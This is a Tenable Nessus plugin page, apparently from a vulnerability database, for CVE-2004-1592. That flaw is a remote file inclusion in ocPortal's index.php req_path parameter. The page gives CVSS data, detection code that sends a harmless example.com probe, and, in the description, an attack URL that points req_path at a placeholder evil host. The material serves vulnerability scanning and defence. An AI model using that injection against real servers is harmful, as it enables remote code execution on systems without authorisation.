Lucene search

K
nessusThis script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.OCP_PORTAL_FILE_INCLUDE.NASL
HistoryOct 13, 2004 - 12:00 a.m.

ocPortal index.php req_path Parameter Remote File Inclusion

2004-10-1300:00:00
This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
84

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.052

Percentile

93.1%

The remote host is running ocPortal, a content management system written in PHP.

There is a bug in the remote version of this software which may allow an attacker to execute arbitrary commands on the remote host by using a file inclusion bug in the file ‘index.php’.

An attacker may execute arbitrary commands by requesting :

http://www.example.com/index.php?req_path=http://[evilsite]/

which will make the remote script include the file ‘funcs.php’ on the remote site and execute it.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(15468);
  script_version("1.15");
  script_cve_id("CVE-2004-1592");
  script_bugtraq_id(11368);

  script_name(english:"ocPortal index.php req_path Parameter Remote File Inclusion");
  script_summary(english:"Determines if ocPortal can include third-party files");

  script_set_attribute(attribute:"synopsis", value:
"The remote host has an application that is affected by a 
remote file inclusion vulnerability." );
  script_set_attribute(attribute:"description", value:
"The remote host is running ocPortal, a content management 
system written in PHP.

There is a bug in the remote version of this software which
may allow an attacker to execute arbitrary commands on the 
remote host by using a file inclusion bug in the file 
'index.php'.

An attacker may execute arbitrary commands by requesting :

  http://www.example.com/index.php?req_path=http://[evilsite]/

which will make the remote script include the file 'funcs.php' on the remote
site and execute it." );
  script_set_attribute(attribute:"solution", value:"Upgrade the newest version of this software" );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2004-1592");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_publication_date", value: "2004/10/13");
  script_set_attribute(attribute:"vuln_publication_date", value: "2004/10/13");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();


  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencie("find_service1.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

if(!can_host_php(port:port))exit(0,"The remote web server does not support PHP");

foreach d (cgi_dirs())
{
 url = string(d, "/index.php?req_path=http://example.com/");
 res = http_send_recv3(method:"GET", item:url, port:port);
 if( isnull(res)) exit(0);
 if ( "http://example.com/funcs.php" >< res[2] )
 {
  security_hole(port);
  exit(0);
 }
}

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.052

Percentile

93.1%

Related for OCP_PORTAL_FILE_INCLUDE.NASL